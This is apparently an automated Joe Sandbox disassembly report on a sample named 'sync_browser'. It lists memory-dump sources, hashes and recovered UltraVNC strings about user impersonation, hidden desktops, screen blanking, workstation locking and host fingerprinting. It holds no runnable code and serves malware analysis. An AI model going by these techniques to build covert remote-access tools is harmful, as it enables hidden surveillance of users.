                                                    • String ID: HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x
                                                    • API String ID: 2777246624-1480653996
                                                    • Opcode ID: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
                                                    • Instruction ID: 1618950c009454188104730eb5f46315f9b153985a8866473eb850ba312f30db
                                                    • Opcode Fuzzy Hash: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
                                                    • Instruction Fuzzy Hash: 3E511B60A185A787F718BBA4A900FBDAF91AF90B48FC44033CC0D975A5DE3D6509C371
                                                    APIs
                                                    Strings
                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed, xrefs: 00007FF7D595C455
                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s, xrefs: 00007FF7D595C3DC
                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call, xrefs: 00007FF7D595C2F4
                                                    • g, xrefs: 00007FF7D595C31B
                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error, xrefs: 00007FF7D595C43D
                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked, xrefs: 00007FF7D595C3A7
                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1, xrefs: 00007FF7D595C37E
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$Leave$Enter
                                                    • String ID: g$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s
                                                    • API String ID: 2978645861-1267036565
                                                    • Opcode ID: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
                                                    • Instruction ID: f31fc3ebfae619ddeef77aa424339b14385909c45da0c48f3aee7f5bd0097d70
                                                    • Opcode Fuzzy Hash: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
                                                    • Instruction Fuzzy Hash: BB516E22A1869286F615BF25A804AFDABA1FF89F98FC41033DD4E47294DF3DE115C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteObjectRectfree$CombineCreateCriticalEventSection$EnterErrorFreeHeapLastLeave_errnomalloc
                                                    • String ID: \$vncclient.cpp : FATAL! client update region is empty!
                                                    • API String ID: 1264956880-3227535004
                                                    • Opcode ID: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
                                                    • Instruction ID: 4a283a3d8bc2c822c99274a5ea7573645aa9bfa1f50643d7e391d9845ec4fce6
                                                    • Opcode Fuzzy Hash: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
                                                    • Instruction Fuzzy Hash: A2A1D6326146A58AD744EF1AE444A6EBBA8FBC9F94F814036EE4D43754CF3DD805CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MSIL Processor)$Current user :
                                                    • API String ID: 171970310-1756215141
                                                    • Opcode ID: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
                                                    • Instruction ID: f450459aba80ba28f7391aff1030537a66024bc6000b8eb35562b55dfd2e9953
                                                    • Opcode Fuzzy Hash: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
                                                    • Instruction Fuzzy Hash: 80B17121A0868686E7649B3598006BD7BA0FB45BB4FC04337EA7E87AD5DF2CE515C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MIPS Processor)$Current user :
                                                    • API String ID: 171970310-18614430
                                                    • Opcode ID: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
                                                    • Instruction ID: ae35ac4db920dbd815ecb3abf97967f60d415ef68926393ead81966ff2b6ae3f
                                                    • Opcode Fuzzy Hash: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
                                                    • Instruction Fuzzy Hash: 84B18121A0868686E7649B3598006BD7BA0FB45BB4FC04337EE7E87AD5DF2CE515C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (SHX Processor)$Current user :
                                                    • API String ID: 171970310-3227166451
                                                    • Opcode ID: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                    • Instruction ID: f29115c82e7fe9b1bba122e868ddbe69675ce4508770d38f1e3ce4a06ab458c0
                                                    • Opcode Fuzzy Hash: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                    • Instruction Fuzzy Hash: AAB17F21A0868686EB64DB3598006BD77A0FB45BB4FC04337EA7E87AD5DF2CE555C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (ARM Processor)$Current user :
                                                    • API String ID: 171970310-978419383
                                                    • Opcode ID: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                    • Instruction ID: 8b141bc3231a1c10f4883cedccaccb682fe62146dbb4fd4443ec5a817e712dfa
                                                    • Opcode Fuzzy Hash: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                    • Instruction Fuzzy Hash: 3BB17F21A0868686EB649B3598006BD77A0FB45BB4FC04337EA7E87AD5DF2CE515C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha Processor)$Current user :
                                                    • API String ID: 171970310-733379141
                                                    • Opcode ID: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                    • Instruction ID: 467de048e6a4e7f3c5e54bb65c35d3f6d5575e127132bc04aa8a2a48d79f9bfd
                                                    • Opcode Fuzzy Hash: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                    • Instruction Fuzzy Hash: 4AB16021A0868686EB64DB3598006BD77A0FB45BB4FC04337EA7E87AD5DF28E515C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Intel Processor)$Current user :
                                                    • API String ID: 171970310-3029765189
                                                    • Opcode ID: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
                                                    • Instruction ID: 7834c953792800490e2c6c647c68fe612cbf20a0c382cf397acfe6113e2910bd
                                                    • Opcode Fuzzy Hash: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
                                                    • Instruction Fuzzy Hash: FAB17121A0868686EB64DB3598006BD77A0FB45BB4FC04337EA7E87AD5DF28E515C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Desktop$MessageThread$CloseCurrentDispatchInformationInputObjectOpenTranslateUser
                                                    • String ID: black_layered.cpp : !GetUserObjectInformation $black_layered.cpp : OpenInputdesktop Error $black_layered.cpp : OpenInputdesktop OK$black_layered.cpp : SelectHDESK to %s (%x) from %x$black_layered.cpp : SelectHDESK:!SetThreadDesktop $black_layered.cpp : end BlackWindow
                                                    • API String ID: 2763862709-1375279643
                                                    • Opcode ID: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
                                                    • Instruction ID: 6918a1fe2596601bb15819be0943f4d02e7fa8f14e908f6721a9229f6d8b5889
                                                    • Opcode Fuzzy Hash: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
                                                    • Instruction Fuzzy Hash: 4D414121A1869393FA18BB75A854ABEA790EFC4F98FC44033DD4E56568DF3CD105C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc$Sleep$DebugErrorLastOutputStringsprintf
                                                    • String ID: LockWorkStation$LockWorkstation failed with error 0x%0X$WinStationConnectW$user32.dll$winsta.dll
                                                    • API String ID: 2931780912-670137772
                                                    • Opcode ID: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
                                                    • Instruction ID: 161981cb16403b3a4dcdf3303bbe2efef9541a7064eb44411a77b15b167dc2ff
                                                    • Opcode Fuzzy Hash: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
                                                    • Instruction Fuzzy Hash: 17316D25A19A5687EE18BF65A454ABEA7A0FF94F84FC81032DE0E03654DF3CE805C334
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandleProcess$OpenWindow$CreateErrorFileFindLastModuleNameThreadTokenUser
                                                    • String ID: -settingshelper$Shell_TrayWnd$Winsta0\Default
                                                    • API String ID: 421869683-3362258117
                                                    • Opcode ID: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                    • Instruction ID: 5db32c5dc391e3378fbd9685354a475afbe94d10a5ab0957d993809054ce92e2
                                                    • Opcode Fuzzy Hash: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                    • Instruction Fuzzy Hash: DA51B432A18B5186E7149F25A8506ADBBA4FF88B94FC44236EE5D43B98CF3CE115C750
                                                    APIs
                                                    Strings
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF7D594695B
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7D59469A4
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF7D5946A0B
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF7D5946BB2
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF7D59469F2
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF7D5946A39
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
